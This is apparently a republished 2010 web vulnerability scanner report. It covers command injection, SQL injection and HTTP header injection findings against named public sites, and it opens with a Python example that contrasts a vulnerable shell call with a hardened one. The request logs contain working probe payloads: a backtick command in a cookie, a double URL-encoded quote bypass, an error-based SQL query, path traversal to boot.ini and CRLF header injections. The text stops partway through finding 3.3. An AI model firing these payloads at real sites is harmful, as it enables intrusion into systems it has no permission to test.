If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform commands beyond the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:
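The following is an added example, written for this page and not part of the scanner report or of the community.jboss.org application, showing the pattern behind finding 1 next to its hardened form. The handler names, the `echo` command and the payload are assumptions modelled on the report's `__utmc` value; `echo INJECTED` stands in for the report's `ping -c 20 127.0.0.1` so execution is visible as output rather than as a delay. The two layers it applies are strict allowlist validation of the value and launching the program by name with an argument list instead of a shell command string; `delay_confirmed` is the timing inference the scanner used, with the report's own millisecond figures.

```python
import re
import subprocess

# Constructed payload modelled on the report's __utmc cookie value. `echo INJECTED` stands in
# for the report's `ping -c 20 127.0.0.1` so that execution is visible immediately rather
# than as a delay.
PAYLOAD = "153813930`echo INJECTED`"


def lookup_vulnerable(utmc: str) -> str:
    """Hypothetical vulnerable handler: the cookie value is spliced into a command string
    that is handed to /bin/sh, so backticks (and ;, |, $(...)) are interpreted."""
    cmd = "echo visitor=" + utmc
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def lookup_no_shell(utmc: str) -> str:
    """Second layer alone: launch the program by name with an argument list and no shell.
    Metacharacters reach the program as literal bytes of a single argument."""
    result = subprocess.run(["echo", "visitor=" + utmc], capture_output=True, text=True)
    return result.stdout.strip()


# A __utmc value is a numeric identifier (assumed from the value seen in the report).
UTMC_RE = re.compile(r"[0-9]{1,20}")


def lookup_hardened(utmc: str) -> str:
    """Both layers: allowlist the value, then run the program without a shell."""
    if UTMC_RE.fullmatch(utmc) is None:
        raise ValueError("rejected __utmc value: " + repr(utmc))
    return lookup_no_shell(utmc)


def delay_confirmed(baseline_ms: float, observed_ms: float, injected_delay_s: float) -> bool:
    """Time-based verification used when command output is not reflected: the injected
    command is judged to have run if the extra latency is at least the delay it would add."""
    return observed_ms - baseline_ms >= injected_delay_s * 1000


if __name__ == "__main__":
    print("vulnerable :", lookup_vulnerable(PAYLOAD))   # INJECTED appended by the shell
    print("no shell   :", lookup_no_shell(PAYLOAD))     # backticks printed literally
    try:
        lookup_hardened(PAYLOAD)
    except ValueError as exc:
        print("hardened   :", exc)
    print("hardened   :", lookup_hardened("153813930"))
    # The report's figures: 1020 ms baseline, 35911 ms with the payload. `ping -c 20` on
    # Linux takes roughly 19 s (assumed), so the extra latency is attributed to the command.
    print("delay seen :", delay_confirmed(1020, 35911, 19))
```

The argument-list form is the fix that holds regardless of which metacharacters the validator forgot; the allowlist is defence in depth, and also the only layer that helps when the downstream program itself interprets its argument.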

Request

GET /people/dan.j.allen/blog/2010/10/20/speaking-at-utah-jug HTTP/1.1
Host: community.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rh_omni_tc=70160000000H4AjAAK; JSESSIONID=DDE1B860157F60EF7F32B1C587D04C48.node0; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=""; __utmz=153813930.1289831027.1.1.utmcsr=jboss.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=redhatglobal%2Credhatjbossorg%3D%2526pid%253Dhttp%25253A//community.jboss.org/account/login.jspa%2526oid%253DLogin%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D428; jive.server.info="serverName=community.jboss.org:serverPort=80:contextPath=:localName=clearspace02.app.mwc.hst.phx2.redhat.com:localPort=8080:localAddr=10.5.106.15"; s_ria=flash%2010%7Csilverlight%20not%20detected; s_vnum=1292422844821%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1289831298721; __utma=153813930.861303267.1289831027.1289831027.1289831027.1; __utmc=153813930`ping%20-c%2020%20127.0.0.1`; __utmb=153813930.2.10.1289831027;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 16:55:03 GMT
Server: Apache-Coyote/1.1
X-JAL: 35634
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=...[SNIP]...; Expires=Wed, 15-Dec-2010 16:55:39 GMT; Path=/
Vary: User-Agent
X-JSL: D=35719887 t=1289840103770601
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 80971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

2. SQL injection
There are 6 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The KeyWord parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the KeyWord parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 449

AdTagCountyId=..%2f..%2f..%2f..%2f..%2f..%2fCANTBEHERE%2f..%2f..%2f..%2f..%2fboot.ini&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3'&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:35:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 341
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string '3''.</font>
...[SNIP]...

Request 2

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 449

AdTagCountyId=..%2f..%2f..%2f..%2f..%2f..%2fCANTBEHERE%2f..%2f..%2f..%2f..%2fboot.ini&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3''&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:35:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40900
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACATSTCS=CGLJLAHALAKOMBBOIBLPFPHC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...

2.2. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The KeyWord parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the KeyWord parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&KeyWord=--+Keyword+--'&RegionId=3&SubCatId=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:28:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 353
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string '-- Keyword --''.</font>
...[SNIP]...

Request 2

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&KeyWord=--+Keyword+--''&RegionId=3&SubCatId=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 41352
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...

2.3. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [RegionId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The RegionId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the RegionId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the RegionId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&KeyWord=--+Keyword+--&RegionId=3%2527&SubCatId=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:29:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 318
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Line 1: Incorrect syntax near '%'.</font>
...[SNIP]...

2.4. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [RegionId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The RegionId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the RegionId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the RegionId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 449

AdTagCountyId=..%2f..%2f..%2f..%2f..%2f..%2fCANTBEHERE%2f..%2f..%2f..%2f..%2fboot.ini&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3%2527&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40ex
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:37:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 318
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Line 1: Incorrect syntax near '%'.</font>
...[SNIP]...

2.5. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SubCatId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The SubCatId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the SubCatId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the SubCatId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 449

AdTagCountyId=..%2f..%2f..%2f..%2f..%2f..%2fCANTBEHERE%2f..%2f..%2f..%2f..%2fboot.ini&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWo
...[SNIP]...
&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3%2527&UserEmail=netsparker%40example.com&UserPwd=3

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:40:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 318
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Line 1: Incorrect syntax near '%'.</font>
...[SNIP]...

2.6. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SubCatId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The SubCatId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the SubCatId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the SubCatId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=&SubCatId=100%2527&RegionId=&KeyWord=--+Keyword+-- HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 318
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Line 1: Incorrect syntax near '%'.</font>
...[SNIP]...

3. HTTP header injection

There are 14 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://27.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://27.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload df8cc%0d%0afc9c0f60969 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=748&camp=13290&affcode=kw28552&inhURL=&cid=6561960191&networkType=search&url[]=https%3A%2F%2Fddb.kineticd.com%2Fads%2Fppc.aspx/x22&df8cc%0d%0afc9c0f60969=1 HTTP/1.1
Host: 27.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:31:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=260e714d-3349-3fa8-629a-00004b889a33; expires=Sun, 13-Feb-2011 09:31:38 GMT; path=/; domain=.xg4ken.com
Location: https://ddb.kineticd.com/ads/ppc.aspx/x22?df8cc
fc9c0f60969
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

3.2. http://27.xg4ken.com/media/redir.php [url[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://27.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload f07da%0d%0a7c3685c0c33 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=748&camp=13290&affcode=kw28552&inhURL=&cid=6561960191&networkType=search&url[]=https%3A%2F%2Fddb.kineticd.com%2Fads%2Fppc.aspx/x22f07da%0d%0a7c3685c0c33 HTTP/1.1
Host: 27.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:31:39 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=2ed9d8ec-0b69-c609-d39a-000059980589; expires=Sun, 13-Feb-2011 09:31:39 GMT; path=/; domain=.xg4ken.com
Location: https://ddb.kineticd.com/ads/ppc.aspx/x22f07da
7c3685c0c33

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

3.3. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 91a3b%0d%0a8a3d72eaf29 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

